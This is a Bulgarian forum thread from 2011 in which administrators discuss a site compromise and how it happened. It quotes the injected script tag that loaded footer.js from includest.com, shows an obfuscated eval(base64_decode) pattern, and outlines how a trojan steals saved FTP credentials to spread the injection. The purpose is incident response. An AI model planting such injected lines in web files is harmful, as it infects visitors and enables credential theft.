Май има някакъв проблем във форума...

Пишете за оплаквания, въпроси и/или предложения по форума. Или недейте...

Moderator: Moridin

User avatar
Roamer
Ascendent
Posts: 4895
Joined: Wed Jan 03, 2007 5:25 pm
Location: Hier ist hier und jetzt ist jetzt doch jetzt ist jetzt schon nicht mehr da...
Contact:

Post by Roamer » Tue Oct 11, 2011 11:14 pm

Имаше проблем във форума. Оправен е. Ще помоля всички, които имат достъп до сайта чрез FTP, SFTP или нещо такова, да си проверят компютрите за вируси и троянски коне, защото е бил някой от нас :)

Майтапът е, че не мога да намеря информация точно за такъв trojan, който да добавя на края на файловете <script src="http://includest.com/footer.js"></script> (НЕ кликайте на това, ако се показва като връзка; не е забавно :)). Виждал съм много подобни троянски коне, които по този начин прескачат от компютър към всички уебсайтове, до които собственикът на компютъра е имал достъп, оттам на компютрите на доста от посетителите и т.н.... но точно пък с includest.com не бях виждал.
Eric: I use my sword to detect good on it.
Ed: It's not good, Eric. It's a gazebo.

User avatar
Xellos
Moderator
Posts: 20425
Joined: Fri Apr 02, 2004 10:08 pm

Post by Xellos » Tue Oct 11, 2011 11:15 pm

:yay:
„Ние можещите, водени от незнаещите, вършим невъзможното за кефа на неблагодарните. И сме направили толкова много, с толкова малко, за толкова кратко време, че можем да правим всичко от нищо. ... За мен най-лошото в България е чудесното наслаждение, което тук имат хората да се преследват един друг и да развалят един другиму работата.”

User avatar
The Dragon
Elder God
Posts: 9061
Joined: Wed Jan 14, 2004 9:03 pm

Post by The Dragon » Tue Oct 11, 2011 11:44 pm

Roamer wrote:Имаше проблем във форума. Оправен е. Ще помоля всички, които имат достъп до сайта чрез FTP, SFTP или нещо такова, да си проверят компютрите за вируси и троянски коне, защото е бил някой от нас :)

Майтапът е, че не мога да намеря информация точно за такъв trojan, който да добавя на края на файловете <script src="http://includest.com/footer.js"></script> (НЕ кликайте на това, ако се показва като връзка; не е забавно :)). Виждал съм много подобни троянски коне, които по този начин прескачат от компютър към всички уебсайтове, до които собственикът на компютъра е имал достъп, оттам на компютрите на доста от посетителите и т.н.... но точно пък с includest.com не бях виждал.
Я обясни какъв точно е бил проблема?
The sinking of the Titanic was a miracle to the lobsters in the ship's kitchen.

User avatar
Moridin
Global Moderator
Posts: 19290
Joined: Fri Dec 19, 2003 10:21 pm
Location: On the other side
Contact:

Post by Moridin » Wed Oct 12, 2011 6:22 am

Ха, казах ти, Даниеле :Р
This is it. Ground zero.

User avatar
The Dragon
Elder God
Posts: 9061
Joined: Wed Jan 14, 2004 9:03 pm

Post by The Dragon » Wed Oct 12, 2011 11:52 am

Хммм
дава някакви неща в redone tag gz. кой го е пипал правил и защо :)
The sinking of the Titanic was a miracle to the lobsters in the ship's kitchen.

User avatar
Roamer
Ascendent
Posts: 4895
Joined: Wed Jan 03, 2007 5:25 pm
Location: Hier ist hier und jetzt ist jetzt doch jetzt ist jetzt schon nicht mehr da...
Contact:

Post by Roamer » Wed Oct 12, 2011 1:01 pm

Преди около година се появи нов клас троянски коне, които работят по следния начин:

1. В HTML, JS, PHP и т.н. файлове на някой уебсайт се появява още един ред, който понякога (като в този случай) е просто "<script src="http://blaaaa/something.js"></script>", а друг път е същото, ама силно obfuscate-нато - eval(base64_decode("GBFDJXDFHFGHDHFFHGBHDFH")) или нещо такова.

2. Браузърът на жертвата поглежда някой от променените HTML, JS, PHP и т.н. файлове, изпълнява този ред и тегли въпросния something.js.

3. Този something.js използва проблем в сигурността на браузъра, за да "пробие" до ниво достъп до локални файлове и да инсталира троянския кон върху компютъра на жертвата

4. Троянският кон периодично претърсва компютъра за инсталирани неща като CuteFTP, FileZilla, WinSCP и други такива FTP/SFTP клиенти и събира запазените usernames и пароли, като ги предава на някакъв централен сървър.

5. В един момент - понякога седмици или дори месеци след оригиналното заразяване - централният сървър казва на всичките си войничета "айде, ето ви тук username и парола за ей-тоя сървър, действайте!" - и една орда zombie minions от цял свят започват да се закачат за сървъра, теглят де що има HTML, PHP, JS и т.н. файлове - *и добавят <script src="..."> накрая!* :)

6. В следващия момент някой невинен клиент поглежда сайта, браузърът му вижда <script src="...">... и цикълът започва отново :)
Eric: I use my sword to detect good on it.
Ed: It's not good, Eric. It's a gazebo.

User avatar
Marfa
Moderator
Posts: 11251
Joined: Sat Dec 20, 2003 10:12 pm
Contact:

Post by Marfa » Wed Oct 12, 2011 2:26 pm

Ъ... :shock: Ами аз на мойта FileZilla като имам 5-6 запазени юзърнейми и пароли?! Ко се прай в такива случаи?
This octopus! Let's give him boots, send him to North Korea!

Image<-Подробно описание на нещата, които ми образуват нерви :twisted:
Уук.

User avatar
Roamer
Ascendent
Posts: 4895
Joined: Wed Jan 03, 2007 5:25 pm
Location: Hier ist hier und jetzt ist jetzt doch jetzt ist jetzt schon nicht mehr da...
Contact:

Post by Roamer » Wed Oct 12, 2011 2:43 pm

Ако имаш подозрения, че през компютъра ти е минал такъв trojan, ЗАДЪЛЖИТЕЛНО сменяш ВСИЧКИ запазени пароли. Няма друг начин. Повярвай ми, борил съм се с такива trojans няколко пъти миналата година в Space.BG и в CNsys (и от клиенти, и от колеги, и изобщо)... няма друг начин.
Eric: I use my sword to detect good on it.
Ed: It's not good, Eric. It's a gazebo.

User avatar
Marfa
Moderator
Posts: 11251
Joined: Sat Dec 20, 2003 10:12 pm
Contact:

Post by Marfa » Wed Oct 12, 2011 2:57 pm

OK! Веднага!
This octopus! Let's give him boots, send him to North Korea!

Image<-Подробно описание на нещата, които ми образуват нерви :twisted:
Уук.

bsb
Paragon
Posts: 640
Joined: Sun Dec 06, 2009 7:33 pm

Post by bsb » Wed Oct 12, 2011 3:05 pm

Не "веднага", а след като си проверила за вируси и си сигурна, че няма. Защото ако троянецът е активен, като си смениш паролите, той ще прехване и новите.

User avatar
Moridin
Global Moderator
Posts: 19290
Joined: Fri Dec 19, 2003 10:21 pm
Location: On the other side
Contact:

Post by Moridin » Wed Oct 12, 2011 3:15 pm

Съвсем вярно е всичко това (и го срещнах в няколко случая миналата година), но сега въпросът е как се изкоренява троянецът, едва ли можеш да изтриеш всички .js файлове от компа? :)

също така ми е интересно къде има инфо за цялото това, т.е. интересно ми е как точно джаваскрипт файлът успява да се изпълни и да рови из локалните данни на фтп сървърите.


edit: ааа моя грешка, всъщност троянецът вероятно си е някакво dll/so? имам подозрението, че антивирусните едва ли ще го хванат....
This is it. Ground zero.

User avatar
Xellos
Moderator
Posts: 20425
Joined: Fri Apr 02, 2004 10:08 pm

Post by Xellos » Wed Oct 12, 2011 4:09 pm

Напоследък антивирусните хващат главно и основно кракове за игри, и всяка различно вади :mrgreen: авирата не ми е пискала за нищичко от месеци реално.
„Ние можещите, водени от незнаещите, вършим невъзможното за кефа на неблагодарните. И сме направили толкова много, с толкова малко, за толкова кратко време, че можем да правим всичко от нищо. ... За мен най-лошото в България е чудесното наслаждение, което тук имат хората да се преследват един друг и да развалят един другиму работата.”

User avatar
Roamer
Ascendent
Posts: 4895
Joined: Wed Jan 03, 2007 5:25 pm
Location: Hier ist hier und jetzt ist jetzt doch jetzt ist jetzt schon nicht mehr da...
Contact:

Post by Roamer » Wed Oct 12, 2011 4:53 pm

Всъщност е имало случаи антивирусни програми да хващат такива жувотни. Затова се чудя защо не мога да намеря информация конкретно за този (имам само URL-то, което той добавя в script, само по него търся), че да ви кажа по-конкретно точно кой е и с какво се чисти.
Eric: I use my sword to detect good on it.
Ed: It's not good, Eric. It's a gazebo.

User avatar
Kolender
Farmer
Posts: 72
Joined: Fri Jun 13, 2008 3:57 pm

Post by Kolender » Wed Oct 12, 2011 5:05 pm

Ще помоля всички, които имат достъп до сайта чрез FTP, SFTP или нещо такова, да си проверят компютрите за вируси и троянски коне, защото е бил някой от нас
Това значи, че потенциалната опасност от троянския кон/вирус е за хората от екипа на Shadowdance. За другите потребители има ли опасност? Въпросът ми е мега тъп предполагам, но хич ме няма с материята.

User avatar
Roamer
Ascendent
Posts: 4895
Joined: Wed Jan 03, 2007 5:25 pm
Location: Hier ist hier und jetzt ist jetzt doch jetzt ist jetzt schon nicht mehr da...
Contact:

Post by Roamer » Wed Oct 12, 2011 5:31 pm

Хм. Истината е, че докато писах това, бях все още под впечатление от бързането да го оправя и бях съсредоточен върху причината и само част от резултатите (това, че форумът на практика не работеше твърде добре :)).

Да - всички, които са отваряли главната (или която и да е) страница на форума вчера, докато той не позволяваше login и още няколко неща не работеха, са потенциално засегнати от проблема. Ако браузърът ви е заредил footer.js, както пишеше в HTML-ите, може и да сте заразени. За съжаление все още не знам точно с какво :? :D
Eric: I use my sword to detect good on it.
Ed: It's not good, Eric. It's a gazebo.

Who is online

Users browsing this forum: No registered users and 0 guests